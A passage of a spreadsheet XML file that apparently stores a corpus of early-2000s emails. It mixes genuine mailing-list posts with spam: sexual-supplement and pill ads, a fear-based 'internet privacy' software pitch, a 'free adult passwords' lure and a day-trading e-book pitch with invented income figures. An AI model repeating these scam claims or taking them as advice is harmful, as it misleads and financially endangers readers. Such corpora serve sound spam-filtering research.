 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025/vigorette.jpg" wi=
 dth=3D"98" height=3D"159"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" color=
 =3D"#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"116%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;M=
 en,
         Increase Your Energy Level &amp;amp; Maintain Stronger Erections!&lt;/td&gt;
       &lt;td width=3D"125%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;E=
 dible,
         Specially Formulated Lubricant For Everyone!&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;W=
 omen,
         Heighten Your Sexual Desire &amp;amp; Increase Your Sexual Climax!&lt;/td=
 &gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
         &lt;div align=3D"center"&gt;
           &lt;table border=3D"0" width=3D"99%" height=3D"44" bgcolor=3D"#FF00=
 00"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"38" align=3D"center" bordercolo=
 r=3D"#FFFF99" style=3D"border: 1 solid #FFFF99" nowrap&gt;&lt;b&gt;&lt;font color=3D"#=
 FFFF99" size=3D"5" face=3D"Tahoma"&gt;&lt;a href=3D"http://www.medievalmedia.com=
 /" style=3D"color: #FFFF99; font-size: 14pt; font-weight: bold"&gt;CLICK
                 HERE to Get it While it's HOT!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"460" height=3D"99" cellspacing=3D"0" cellpa=
 dding=3D"0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"93" align=3D"center"&gt;&lt;font face=3D"Verd=
 ana" color=3D"#000000" size=3D"1"&gt;You
         are receiving this special offer because you have provided permiss=
 ion to
         receive email communications regarding special online promotions o=
 r
         offers. If you feel you have received this message in error, or wi=
 sh to
         be removed from our subscriber list, &lt;a style=3D"COLOR: #ff0000" h=
 ref=3D"mailto:print5@btamail.net.cn?Subject=3DUNSUBSCRIBE"&gt;Click
         HERE&lt;/a&gt; and you will be removed within less than three business d=
 ays.
         Thank You and sorry for any inconvenience.&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get EZ Internet Privacy for peace of mind.
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear dhudobenko ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Arial" size="2"&gt;YOUR INTERNET USAGE IS BEING TRACKED&lt;br&gt;
 You have no privacy protection.&lt;br&gt;
 Will your BOSS, WIFE or KIDS find out?&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font face="Arial"&gt;
 &lt;a href="http://www185.wiildaccess.com/"&gt;DOWNLOAD EZ INTERNET PRIVACY SOFTWARE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;
 &lt;br&gt;
 +++++++++++++++++++++++++++++++++++++++++++&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 You're in Serious Trouble - It's a Proven Fact!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Deleting &amp;quot;Internet Cache and History&amp;quot; will NOT protect you because any of&lt;br&gt;
 the Web Pages, Pictures, Movies, Videos, Sounds, E-mail, Chat Logs and&lt;br&gt;
 Everything Else you see or do could easily be recovered to Haunt you&lt;br&gt;
 forever! How would you feel if a snoop made this information public to your&lt;br&gt;
 Spouse, Mother &amp;amp; Father, Neighbors, Children, Boss or the Media? It could&lt;br&gt;
 easily Ruin Your Life! Solve all your problems and enjoy all the benefits of&lt;br&gt;
 an &amp;quot;As New PC&amp;quot;, EZ INTERNET PRIVACY SOFTWARE can Speed-Up your PC/Internet Browser,&lt;br&gt;
 reclaim Hard Disk space and Professionally Clean your PC in one easy mouse&lt;br&gt;
 click!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Did you know for example that every click you make on Windows 98 Start Menu&lt;br&gt;
 is logged and stored permanently on a hidden encrypted database within your&lt;br&gt;
 own computer?&lt;br&gt;
 Deleting &amp;quot;internet cache and history&amp;quot;, will not protect you... your PC is&lt;br&gt;
 keeping frightening records of both your online and off-line activity. Any&lt;br&gt;
 of the Web Pages, Pictures, Movies, Videos, Sounds, E-mail and Everything&lt;br&gt;
 Else you or anyone else have ever viewed could easily be recovered - even&lt;br&gt;
 many years later!&lt;br&gt;
 How would you feel if somebody snooped this information out of your computer&lt;br&gt;
 and made it public?&lt;br&gt;
 Do your children or their friends use your computers? What have they&lt;br&gt;
 downloaded and tried to delete?&lt;br&gt;
 Act now! And stop these files coming &amp;quot;back from the dead&amp;quot; to haunt you!&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial" size="5"&gt;&lt;a href="http://www185.wiildaccess.com/"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;to be removed &lt;a href="http://www185.wiildaccess.com/takemeoff.html"&gt;Click Here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] re: Steam
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002 10:15:36 -0500 (EST)
 Jay Lake &lt;jlake@jlake.com&gt; wrote:
 &lt;snip&gt;
 &gt;Second, one could make the assumption that ancient or future civilizations
 &gt;would not be hydrocarbon based. There are alternative fuel sources,
 &gt;including seabed methane, biomass and all the usual suspects -- solar,
 &gt;hydro etc. Some of these could be exploited on a decidedly low-tech (ie,
 &gt;emergent civilization) basis. However, it is difficult to conceive of an
 &gt;industrial civilization that doesn't employ wheels, axles and bearings,
 &gt;all of which require lubrication. I'm not an engineer (Robin, anyone?) but
 &gt;it's my understanding that vegetable lubrication breaks down under stress,
 &gt;and that oil or graphite lubricants are the only reasonable choices for
 &gt;high temperature/high rotation applications, at least prior to extremely
 &gt;advanced modes of chemical synthesis.
 This is a good point. There are a lot of alternatives to hydrocarbon
 products derived from petroleum, but these have often been developed as
 a replacement for petroleum after the technology has been established -
 there is a growing industry in plant-derived plastics and lubricants,
 but this is to replicate materials that have been previously created 
 much more easily within the petrochemical industry.
 Vegetable-derived lubricants have been used. The Russians used sunflower
 oil in the lubrication systems of tanks and trucks during the second world 
 war, and work is being done in the UK to produce diesel fuel derived from
 waste cooking oil from fast-food restaurants. 
 Jay's correct in his opinion that vegetable oil is not as durable as 
 petroleum oil, but this is only because of the lack of sophistication 
 of the chemistry involved. Synthetic fuels and lubricants are continuously
 being developed, and I don't see any problems with synthetics ultimately 
 matching the performance of the more conventional products. As the rock
 oil runs out, plant oil derivatives *will* be developed to fill the
 gap. In parallel, changes will occur in the designs of the machines to 
 cope with any changes in performance of the lubricants.
 My big concern is if the technology were ever to be lost for some reason.
 Re-creating a petrochemical industry from scratch without petrochemicals
 (that is, going immediately to plant-based synthetics) would be extremely 
 difficult, especially if it were necessary to recreate *all* of the
 petrochemical-derived products (not just lubricants and fuels). I suspect
 that, bearing in mind the ingenuity of the human race, it would happen,
 just at a different pace. Imagine an industrial revollution based on,
 for example, methane from pig manure, or diesel oil from sunflowers.
 All we would then have to do is get used to all the machines smelling
 like pig farms and fish and chip shops...
 Robin Hill, STEAMY BESS, Brough, East Yorkshire
 ********************************************************************
 This email and any attachments are confidential to the intended
 recipient and may also be privileged. If you are not the intended
 recipient please delete it from your system and notify the sender.
 You should not copy it or use it for any purpose nor disclose or
 distribute its contents to any other person.
 ********************************************************************
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Formatting a windows partition from Linux
</t>
  </si>
  <si>
    <t xml:space="preserve">Update on this for anyone that's interested, and because I like closed 
 threads... nothing worse than an infinite while loop, is there?
 I ended up formatting a floppy on my flatmate's (un-networked) P100 running 
 FAT16 Win95, and mcopied the contents of the bootdisk across. Now I have a 
 FAT16 Win98 install running alongside Slackware, and can play Metal Gear 
 Solid when the mood takes me ;)
 /Ciaran.
 On Wednesday 21 August 2002 16:21, Ciaran Johnston wrote:
 &gt; Dublin said:
 &gt; &gt; If you copy the files from your disk to the c: partition and mark it as
 &gt; &gt; active it should work ...
 &gt;
 &gt; Yeah, I figured that, but it doesn't seem to ... well, if that's the case
 &gt; I'll give it another go tonight, maybe come back with some error messages.
 &gt;
 &gt; Just to clarify for those who didn't understand me initially - I have a
 &gt; floppy drive installed, but it doesn't physically work. There's nowhere
 &gt; handy to pick one up where I am, and I don't fancy waiting a few days for
 &gt; one to arrive from Peats.
 &gt;
 &gt; Thanks for the answers,
 &gt; Ciaran.
 &gt;
 &gt; &gt; You especially need io.sys, command.com and msdos.sys
 &gt; &gt;
 &gt; &gt; your cd driver .sys and read the autoexec.bat and config.sys files for
 &gt; &gt; hints on what you did with your boot floppy &lt;g&gt;
 &gt; &gt;
 &gt; &gt; P
 &gt; &gt;
 &gt; &gt; On Wed, 2002-08-21 at 14:07, Ciaran Johnston wrote:
 &gt; &gt;&gt; Hi folks,
 &gt; &gt;&gt; The situation is this: at home, I have a PC with 2 10Gig HDDs, and no
 &gt; &gt;&gt; (working) floppy drive. I have been running Linux solely for the last
 &gt; &gt;&gt; year, but recently got the urge to, among other things, play some of
 &gt; &gt;&gt; my Windoze games. I normally install the windows partition using a
 &gt; &gt;&gt; boot floppy which I have conveniently zipped up, but I haven't any way
 &gt; &gt;&gt; of writing or reading a floppy.
 &gt; &gt;&gt; So, how do I go about:
 &gt; &gt;&gt; 1. formatting a C: drive with system files (normally I would use
 &gt; &gt;&gt; format /s c: from the floppy).
 &gt; &gt;&gt; 2. Installing the CDROM drivers (my bootdisk (I wrote it many years
 &gt; &gt;&gt; ago) does this normally).
 &gt; &gt;&gt; 3. Booting from the partition?
 &gt; &gt;&gt;
 &gt; &gt;&gt; I wiped all my linux partitions from the first drive and created
 &gt; &gt;&gt; partitions for Windows (HDA1) Slackware and RedHat. I used cfdisk for
 &gt; &gt;&gt; this. I made the first drive (hda) bootable. I then installed the
 &gt; &gt;&gt; windows partition in LILO and reran lilo (installed in MBR). I copied
 &gt; &gt;&gt; the contents of boot.zip to my new windows partition and tried to boot
 &gt; &gt;&gt; it - all I get is a garbled line of squiggles.
 &gt; &gt;&gt;
 &gt; &gt;&gt; Anyone any ideas? I can't think of anywhere in Athlone to get a new
 &gt; &gt;&gt; floppy drive this evening...
 &gt; &gt;&gt;
 &gt; &gt;&gt; Thanks,
 &gt; &gt;&gt; Ciaran.
 &gt; &gt;&gt;
 &gt; &gt;&gt;
 &gt; &gt;&gt;
 &gt; &gt;&gt; --
 &gt; &gt;&gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; &gt;&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 &gt; &gt;&gt; information. List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New iBooks and PowerBooks
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/07.html
 Date: 2002-09-07T06:10:55-08:00
 I am thinking about getting a new Mac. Not any good reason for it though. I'll 
 try to wait it out for one of the new iBooks rumored for next spring. No new 
 PowerBook next month if new models come out. No. I said no! Stop thinking about 
 it. Don't do it. I said don't do it. No. No, it's a really bad idea. Don't. 
 Geez. Stop it! No, not even if it has an even cooler monitor. Or a...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: We'll show you how to get in for FREE!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;BODY BGCOLOR=3D#000000&gt;
 &lt;table width=3D"600" align=3D"center"&gt;&lt;tr&gt;&lt;td align=3D"center"&gt;
 &lt;TABLE WIDTH=3D BORDER=3D0 CELLPADDING=3D0 CELLSPACING=3D0&gt;
  &lt;TR&gt;  &lt;TD&gt;
 &lt;center&gt;
 &lt;font size=3D"7"&gt;&lt;br&gt;
 &lt;TABLE BGCOLOR=3D"red" WIDTH=3D600 BORDER=3D2 CELLPADDING=3D0 CELLSPACING=3D=
 0&gt;
  &lt;TR&gt;  &lt;TD&gt;&lt;font color=3D"white"&gt;
 &lt;center&gt;&lt;br&gt;
 &lt;font size=3D"7"&gt;
 STOP PAYING FOR ADULT SITES!
 &lt;font size=3D"5"&gt;
 &lt;br&gt; &lt;br&gt; 
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt; 
 &lt;font size=3D"5"&gt;
 &lt;center&gt;
 &lt;font color=3D"yellow"&gt;
 We'll show you hot to get FREE PASSWORDS!&lt;br&gt; FREE ACCESS to the TOP sites=
 !&lt;br&gt;&lt;br&gt;
 Little known &lt;b&gt;&lt;i&gt;secrets&lt;/b&gt;&lt;/i&gt; about getting Hot Steamy Content for &lt;b=
 &gt;&lt;i&gt;FREE!&lt;/b&gt;&lt;/i&gt;&lt;br&gt;&lt;br&gt;
 Just follow these
  &lt;a href=3D"http://www.americanteensluts.com/fpp/rune/rune14.html"&gt;&lt;font s=
 ize=3D"7"&gt;6 simple steps!&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;font size=3D"6"&gt;
 Still skeptical? Check out the types of MEGA-sites you can get into for  &lt;=
 a href=3D"http://www.americanteensluts.com/fpp/rune/rune14.html#click"&gt;FRE=
 E!&lt;/a&gt; No catches!
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-15 at 16:38, Jesse wrote:
 &gt; Strata just walked up to me in a cafe in Somerville, MA and
 &gt; asked me how I was getting net here. And _then_ we figured out 
 &gt; that we have shared context.
 The obvious followup is 'there's a cafe in somerville with net access?'
 Luis [19 Pitman St.]
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Googlecooking
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Jim Whitehead wrote:
 --]We've got Googlewhacking, Googlebombing and now we can add Googlecooking to
 --]our lexicon. My mother types whatever ingredients she has on hand into
 --]Google and then picks the most appealing recipe returned in the results.
 --]What a good idea!
 Dude, this is at least two years old and probably older. Of course we had
 a more catchy phrase for it, we call it Iron Chef Google.
 When the garden was in full bloom a few summers back Dawn and I would
 google the ingrediants we just grew to come up with tasty recipes, or more
 often ideas from recipes from which toi make our own.
 Fight the hypebuzzword war, be an army of one:)-
 -tom (iron che tempah)wsmf
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :
 &gt; mplayer works with dga (if i am root) and works with x11
 &gt; and always worked with sdl (but not now with redhat 8)
 &gt; now it gives black screen window and play the music of the movie.
 Strange, because as I said in an earlier post, it works for me. Maybe
 you're missing the SDL_image or something? :-/
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.28 0.17 0.13
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Changed location of incoming mail. exmh not working!!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 It has been signed conforming to RFC2015.
 You'll need PGP or GPG to check the signature.
 ------------=_1031266655-417-16
 Content-Type: text/plain; charset=us-ascii
 On Thu, 05 Sep 2002 14:40:53 PDT, Siva Doriaswamy writes:
 &gt;Recently, my incoming mail (or spool) location moved to another disk.
 &gt;I'm not quite clear how to reconfigure procmail/rcvstore/exmh to accept
 &gt;mail from the new location.
 How do you feed procmail? Not with a .forward, I'd guess.
 How does mail enter your system anyway? Per fetchmail maybe? Or direct 
  SMTP-delivery? Or does it just magically hit your spool?
 Lotsa questions...
 cheers,
 &amp;rw
 -- 
 -- Booze: because one doesn't solve the world's problems over white wine.
 ------------=_1031266655-417-16
 Content-Type: application/pgp-signature; name="signature.ng"
 Content-Disposition: inline; filename="signature.ng"
 Content-Transfer-Encoding: 7bit
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9d+FfE0NzSJr53oIRAtvLAJ9Dq7N0j3WXKRCwPClW+S3mc9uvjACfc8F1
 tcsFzzucvnl9rvSegUfuBZU=
 =G2/X
 -----END PGP SIGNATURE-----
 ------------=_1031266655-417-16--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: are you in the mood             XGHTMTGGC
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 VIAGRA, XENICAL, VIOXX, ZYBAN, PROPECIA &amp;reg;&lt;BR&gt;
 We only offer the real VIAGRA, XENICAL, VIOXX, ZYBAN, PROPECIA &amp;reg;&lt;br&gt;
 No Herbal Supplements at a much reduced rate found anyplace on&lt;br&gt;
 the Internet.all orders shipped discreetly and swiftly to your door&lt;BR&gt;
 &lt;A HREF=3D"http://www.great-meds.com/main2.php?rx=3D18148"&gt;Enter here for =
 pricing and info&lt;/A&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;A HREF=3D"http://greenzer.com/remove.php"&gt;&lt;FONT SIZE=3D"1" COLOR=3D"#FFFF=
 CC"&gt;Enter this link to abandon future offer's?&lt;/FONT&gt;&lt;/A&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranties Here                                                   dhzbj
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect your financial well-being.
 Purchase an Extended Auto Warranty for your Car today. CLICK HERE for a FREE no obligation quote.
 http://www.newnamedns.com/warranty/
 Car troubles always seem to happen at the worst possible time. Protect yourself and your family with a quality Extended Warranty for your car, truck, or SUV, so that a large expense cannot hit you all at once. We cover most vehicles with less than 150,000 miles.
 Buy DIRECT! Our prices are 40-60% LESS!
 We offer fair prices and prompt, toll-free claims service.  Get an Extended Warranty on your car today.
 Warranty plan also includes:
   1)   24-Hour Roadside Assistance.
   2)   Rental Benefit.
   3)   Trip Interruption Intervention.
   4)   Extended Towing Benefit.
 CLICK HERE for a FREE no obligation quote.
 http://www.newnamedns.com/warranty/
 ---------------------------------------
 To easily remove your address from the list, go to: 
 http://www.newnamedns.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wall Street's dirty little secret ...
</t>
  </si>
  <si>
    <t xml:space="preserve">It was the Spring of 1979.  
 I was just a tall, goofy looking kid in middle school
 with buck-teeth and freckles.  Each day in the
 cafeteria, I walked from table to table ...
 Stealing other kids' lunch money.
 No, I didn't rob them with a gun or a knife - I just made
 them a little deal.  "Let me borrow two dollars today," I said,
 "and I'll bring you five dollars next week."  The investment
 was too good to pass up, and other kids were throwing their
 lunch money at me like gravy on mashed potatoes.  Of course 
 when "next week" rolled around and I couldn't pony up the cash,
 I promised to pay them even more the week after that,
 if they would just let me keep their investment a little bit 
 longer.
 Eventually the end of the year came and went, high school
 started and with it came girls, and homework, and parties,
 and sports, and those poor kids from eighth grade had more 
 things on their mind than last year's lunch money.
 I made off with a tidy sum for a middle school kid,
 and I didn't even get beat up.
 Hidden inside this story are the two greatest stock market 
 secrets you will ever learn.
 First of all, greed is your number one enemy. You're not
 going to turn $2 into $5 in a week, so cash out when
 you're ahead.  Don't wait for the boat to sink before 
 grabbing the lifejacket.
 Second, never trust an investment adviser of any kind.
 They are looking out for their own money, not yours.
 The "professionals", those stuffy investment counselors and
 money managers, will always tell you that the best time to
 buy is NOW.  According to those guys, the longer you keep
 your money in the market, the more money you're going to make.
 Ask them when is the best time to sell and their answer is
 "NEVER".  
 In a sense, they are right.  If you put $250,000 in an index
 fund right now, you'll probably have over a million dollars
 in thirty or forty years.  But here's the problem:
 Do you want to WAIT thirty or forty years to be rich?
 Hell no!
 You want the money NOW - so you can enjoy it. It's hard to
 make use of your fortune when you're seventy years old 
 in a wheelchair.  If you could make a million dollars in
 the next few years, what would you do with it?  Where would
 you travel?  What kind of car would you buy?  
 The fact is ... youth is the best time to be rich.
 If your goal is to make quick profits in the market, volatility
 is your ally, and stability your enemy.  You want to see
 those large upswings, two hundred points in a day, followed
 by the four hundred point crash a week later.  You don't
 care if the market went up or down 20% this year as long
 it was UNSTABLE.  That's how you're going to make the 
 money.
 What I'm talking about here is day trading.  
 My father invests the traditional way; he holds some good stocks 
 and he goes up 30K and down 30K. In the long term of 5-10 years 
 he makes money. 
 The day trader buys or sells 5,000 shares of XYZ for a
 $25,000 profit in a 5-10 minute trade.  He acts quickly, taking 
 advantage of all the information at his disposal about a 
 certain stock, and estimating whether it will go up or 
 down within hours, sometimes within minutes.  
 I can teach you how to do this - and how to make amazing 
 amounts of money at it.  It's not rocket science, and you 
 only need to learn a few basic principles to get started.
 Society would have you believe that successful trading is 
 complicated and requires formal training.  
 The truth is, wealthy people use very simple investment 
 strategies to make money.  
 Popular media and investment professionals portray successful
 trading as difficult and complex to scare you out of the boxing
 ring.  They don't want the competetion - and they sure as hell
 don't want you paying a few dollars to an online trading firm
 to execute a trade for which they'd charge you forty or fifty 
 dollars.
 They make their money only if you believe two lies:
 1) That investing is too difficult and risky for the average 
 person.
 2) That using an investment adviser who charges a high 
 commission is safer than trading online for a few bucks 
 per trade.
 Here is what the financial gurus in today's society absolutely,
 positively DO NOT WANT YOU TO KNOW ...
 The strategies for profitable day trading are in fact
 so simple that anyone can do it - provided they spend
 a few hours of studying.  
 After reading over 200 financial books and publications
 during the past decade, and after using day trading
 to successfully make more than four million dollars in
 the stock market, I've learned the following lessons:
 ** Achieving financial success is incredibly simple.
 ** Anyone can do it.
 ** It only takes a few hours to learn.
 When I discovered the secret to day trading, I didn't become
 wealthy overnight.  If you want instant cash, drive to Wal-mart. 
 Buy a ski mask and a shotgun, and rob your local bank. The 
 only way to get rich, quick or otherwise, is through
 hard work, knowledge, and determination.
 After learning the fundamentals of day trading, I started 
 practicing the trading art itself, and the first few weeks
 brought modest gains.  The next few months gave me the practical
 experience I needed to really earn a living, and I was pulling
 close to a six figure income. In less than three years with no 
 formal financial training, minimal effort and only moderate risk,
 I had made my first million.  The knowledge that I gained 
 during those formative trading years I am willing to share
 with you in my new book, the Master Trader.  You will learn from
 my mistakes, and from my successes, as I teach you the simple,
 secret formula for day trading that I've used profitably
 year after year.
 The income of the day trader can be staggering.  Thousands, even 
 hundreds of thousands of dollars can be made or lost within
 minutes.  The difference between making money and losing your 
 shirt is simply this: knowledge.  I will provide that knowledge,
 and I will give you a winning edge at this high-stakes game. 
 Average Income of a Day Trader: 
 5% average an income in excess of $500,000 per year
 22% average an income in excess of $250,000 per year
 35% average an income in excess of $100,000 per year. 
 27% average an income between $50,000 and $99,999 per year 
 11% average an income between $20,000 and $49,999 per year 
 After reading the Master Trader, you will discover extremely 
 profitable, simple yet powerful trading methods that give 
 you an almost unfair trading advantage and make you 
 win DESPITE the current market weakness. 
 Here is just a snippet of what I will teach you:
 *** Make money whether a stock goes up or down.
 *** Learn how to get in and out of stocks within split seconds.
 *** Learn exactly what stocks to trade, the exact price to 
 buy them and the exact price to sell them. 
 *** Save thousands of dollars by learning to avoid the 
 mistakes beginners make.
 *** Learn how to trade stocks like a pro and how to make money 
 consistently in every market! 
 *** Learn proven strategies that give you the highest chance 
 for great success. 
 *** Profit on huge intraday price swings.
 *** Make money on the biggest news stories.
 *** Actively manage your risks and learn how to realize maximum
 returns. 
 *** Learn how to use the tools and information Wall Street 
 professionals use.
 *** Learn how to develop and maintain a winning state of mind. 
 It's time to ask yourself: "Am I going to listen to the 
 Professionals who say BUY BUY BUY but never sell?  Or am
 I going to take control of my own financial future, and
 start making money RIGHT NOW in the stock market?"
 Who is looking out for your best economic interests - some
 wealthy Wall Street stockbroker, or yourself?
 With the Master Trader e-book, you will learn everything you 
 need to know in order to get started with Day Trading ... from 
 choosing the best broker in order to take advantage of the 
 lowest commissions and instant order executions to professional 
 trading strategies that make professional traders millions of 
 dollars.
 The Master Trader e-book is the most comprehensive yet easy to 
 understand and straight-forward book ever written about active 
 trading. If you are serious about success in short term stock 
 trading - ORDER TODAY and start paving the road to your
 own financial future.
 Oh, and remember that scraggly kid in the eighth grade?
 His high school friends laughed when he said he was going to 
 make money in the stock market.  
 Six years later, he bought a beach-front home on the California
 coast - WITH CASH.  Oops, they weren't laughing anymore.
 In a rollercoaster market like we have today, day trading
 is the fastest track to wealth.  If you're looking
 for a long-term retirement investment with no risk 
 that goes up 5% a year, then by all means, this ain't
 your kind of game.
 But if you want the QUICKEST possible way to make a FORTUNE
 in the market, with the lowest element of risk, then
 order the MASTER TRADER e-book right now.  I promise
 to teach you ALL of the secrets that helped me become a
 millionaire through successful day trading.
 You don't need to know anything about the market, and
 anyone can do it, with minimum effort.  It's an easy
 game to win if you know how the pieces move.
 Order the MASTER TRADER e-book right now for only $49.97
 by clicking on the link below:
 http://4tools4life.com/qs
 ******************************************************
 Our company is strictly opposed to unsolicited emails.
 To be removed from this list, please send an email
 to "bulkexpert@yahoo.com"
 ******************************************************
 8149uUYq4-233hRIC7588TJuY9-579ZiuA2166lzLR3-402TYER3917ynRP5-992Zkl62
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 James
 &gt; Rogers
 &gt; Subject: Re: The Curse of India's Socialism
 &gt; 
 &gt; On Tue, 2002-08-20 at 15:01, Ian Andrew Bell wrote:
 &gt; &gt; They
 &gt; &gt; finished their routine with the a quadruple lutz -- laying off
 &gt; &gt; hundreds of thousands of workers when it all came crashing down.
 &gt; 
 &gt; So what?  Nobody is guaranteed employment.  Laying people off is not a
 &gt; crime nor is it immoral.  Companies don't exist to provide employment,
 &gt; nor should they.  The closest we have to such a thing in the US is a
 &gt; Government Job, and look at the quality THAT breeds.
 And further, why focus on the fact they were laid off and not on the
 fact they were hired in the first place?
 BTW: I saw someone claim that aside from the efficiency of the market
 there were also gains to society from irrational behavior.
 If a society has business people that systematically overestimate their
 chances, that is bad for the businessmen but on net a big gain for
 society.  On the social level, the law of averages works to societies
 benefit in a manner it can't for an individual.
 A key reason, in this view, that the US wound up outperforming England
 was that the English investors were too rational for their societies own
 good.
 (Except, of course, when US investors were bilking them to build canals
 and railroads over here.  Thanks, guys.)
 =====================
 Applied to telecom: a lot of dark wire (glass) and innovation will
 eventually be used for pennies on the dollar, the benefits to society
 and the costs to the investors.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: SF Weekly's Ultimate SF Date lineup :-)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 23 Sep 2002, Russell Turpin wrote:
 --]Here's the better idea. Invite her for an afternoon
 --]cruise under the Golden Gate bridge in your Stonehorse
 --]day sailor.
 Good way, heres one that worked for me.
 Work on a database project with that person. After a while hand her the
 keyboard to go get some lunch.
 If when you come back she is talking to the person in the next cube about
 survivor all the time you were gone...go for the one night boom boom plan
 If when you return she has read thru the help screen to try to figure out
 what your working on...go fro the week long dine and do with options for
 more IF she finishes the help docs and does some code.
 If when you come back she has done some  work on the db's infrastructure,
 cleaned up your code and made a few  "additions" to make it work
 better and figures that since you have done enough work for the day  asks
 that you bring lunch and your lap top to the big  screen projection room
 to watch your new DVD of startship troopers..marry her
</t>
  </si>
  <si>
